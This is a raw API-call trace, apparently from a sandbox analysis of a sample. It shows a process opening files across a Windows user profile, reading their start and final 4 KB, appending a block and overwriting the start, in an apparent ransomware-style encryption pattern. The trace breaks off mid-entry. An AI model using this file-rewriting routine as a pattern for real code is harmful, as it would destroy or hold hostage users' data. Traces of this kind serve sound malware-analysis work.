[0180.597] CloseHandle (hObject=0x208) returned 1 [0180.597] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.708] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.709] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x85 [0180.709] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.709] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.709] ReleaseMutex (hMutex=0x168) returned 1 [0180.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Money.url", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0180.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Money.url", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSN Money.url", lpUsedDefaultChar=0x0) returned 13 [0180.709] ReadFile (in: hFile=0x208, lpBuffer=0x2673048, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673048*, lpNumberOfBytesRead=0x2fdf2bc*=0x85, lpOverlapped=0x0) returned 1 [0180.710] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0180.710] WriteFile (in: hFile=0x208, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x60d, lpOverlapped=0x0) returned 1 [0180.710] CloseHandle (hObject=0x208) returned 1 [0180.710] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.711] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.711] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x244 [0180.711] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.711] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.711] ReleaseMutex (hMutex=0x168) returned 1 [0180.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0180.711] ReadFile (in: hFile=0x208, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x244, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x2fdf2bc*=0x244, lpOverlapped=0x0) returned 1 [0180.712] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0180.712] WriteFile (in: hFile=0x208, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x7cc, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x2fdf2d0*=0x7cc, lpOverlapped=0x0) returned 1 [0180.713] CloseHandle (hObject=0x208) returned 1 [0180.713] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\9dHpE5\\xBJbZf-.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\9dhpe5\\xbjbzf-.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.713] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.713] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x9d50 [0180.713] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.713] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.713] ReleaseMutex (hMutex=0x168) returned 1 [0180.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="xBJbZf-.wav", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="xBJbZf-.wav", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xBJbZf-.wav", lpUsedDefaultChar=0x0) returned 11 [0180.714] ReadFile (in: hFile=0x208, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0180.715] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x8d50 [0180.715] ReadFile (in: hFile=0x208, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0180.715] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x8d50 [0180.715] WriteFile (in: hFile=0x208, lpBuffer=0x25ad6d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad6d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.716] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0180.716] WriteFile (in: hFile=0x208, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.716] CloseHandle (hObject=0x208) returned 1 [0180.716] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\f73fI\\LWdEo0NkmQwd.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\f73fi\\lwdeo0nkmqwd.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.716] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.716] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x5c81 [0180.717] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.717] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.717] ReleaseMutex (hMutex=0x168) returned 1 [0180.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LWdEo0NkmQwd.wav", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0180.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LWdEo0NkmQwd.wav", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LWdEo0NkmQwd.wav", lpUsedDefaultChar=0x0) returned 16 [0180.717] ReadFile (in: hFile=0x208, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0180.718] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4c81 [0180.718] ReadFile (in: hFile=0x208, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0180.718] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4c81 [0180.718] WriteFile (in: hFile=0x208, lpBuffer=0x25ad6d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad6d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.718] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0180.718] WriteFile (in: hFile=0x208, lpBuffer=0x26b2008*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0180.719] CloseHandle (hObject=0x208) returned 1 [0180.719] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\XBXuL7EWRu5aAzPmdq7F\\Rc1HLHE1HVBxCou.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\xbxul7ewru5aazpmdq7f\\rc1hlhe1hvbxcou.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.719] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.719] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xe08e [0180.719] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.719] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.719] ReleaseMutex (hMutex=0x168) returned 1 [0180.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rc1HLHE1HVBxCou.m4a", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0180.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rc1HLHE1HVBxCou.m4a", cchWideChar=19, lpMultiByteStr=0x1f88c44, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rc1HLHE1HVBxCou.m4a", lpUsedDefaultChar=0x0) returned 19 [0180.720] ReadFile (in: hFile=0x208, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0180.721] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xd08e [0180.721] ReadFile (in: hFile=0x208, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0180.721] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xd08e [0180.721] WriteFile (in: hFile=0x208, lpBuffer=0x25ad6d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad6d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.721] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0180.721] WriteFile (in: hFile=0x208, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.721] CloseHandle (hObject=0x208) returned 1 [0180.722] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.722] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.722] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x14 [0180.727] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.728] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.728] ReleaseMutex (hMutex=0x168) returned 1 [0180.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntuser.ini", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0180.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntuser.ini", cchWideChar=10, lpMultiByteStr=0x1f7360c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntuser.ini", lpUsedDefaultChar=0x0) returned 10 [0180.728] ReadFile (in: hFile=0x208, lpBuffer=0x1f732c8, nNumberOfBytesToRead=0x14, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f732c8*, lpNumberOfBytesRead=0x2fdf2bc*=0x14, lpOverlapped=0x0) returned 1 [0180.729] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0180.729] WriteFile (in: hFile=0x208, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x59c, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x59c, lpOverlapped=0x0) returned 1 [0180.729] CloseHandle (hObject=0x208) returned 1 [0180.729] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fFQRpDCXsB\\-CJVJC6vVt.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ffqrpdcxsb\\-cjvjc6vvt.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.730] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.730] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x16339 [0180.730] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.730] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.730] ReleaseMutex (hMutex=0x168) returned 1 [0180.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="-CJVJC6vVt.gif", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0180.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="-CJVJC6vVt.gif", cchWideChar=14, lpMultiByteStr=0x1f732cc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-CJVJC6vVt.gif", lpUsedDefaultChar=0x0) returned 14 [0180.730] ReadFile (in: hFile=0x208, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0180.731] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x15339 [0180.731] ReadFile (in: hFile=0x208, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0180.732] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x15339 [0180.732] WriteFile (in: hFile=0x208, lpBuffer=0x25ad6d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad6d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.732] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0180.732] WriteFile (in: hFile=0x208, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.732] CloseHandle (hObject=0x208) returned 1 [0180.737] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.737] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.737] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x11a [0180.737] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.737] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.738] ReleaseMutex (hMutex=0x168) returned 1 [0180.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0180.738] ReadFile (in: hFile=0x208, lpBuffer=0x1ecbe08, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ecbe08*, lpNumberOfBytesRead=0x2fdf2bc*=0x11a, lpOverlapped=0x0) returned 1 [0180.739] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0180.739] WriteFile (in: hFile=0x208, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x6a2, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x2fdf2d0*=0x6a2, lpOverlapped=0x0) returned 1 [0180.739] CloseHandle (hObject=0x208) returned 1 [0180.739] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\EoH7mBquEvOKApaV8\\EWm8Ek.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\eoh7mbquevokapav8\\ewm8ek.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.740] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.740] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x51d6 [0180.740] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.740] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.740] ReleaseMutex (hMutex=0x168) returned 1 [0180.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EWm8Ek.mp4", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0180.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EWm8Ek.mp4", cchWideChar=10, lpMultiByteStr=0x1f7346c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EWm8Ek.mp4", lpUsedDefaultChar=0x0) returned 10 [0180.740] ReadFile (in: hFile=0x208, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0180.741] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x41d6 [0180.741] ReadFile (in: hFile=0x208, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0180.742] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, 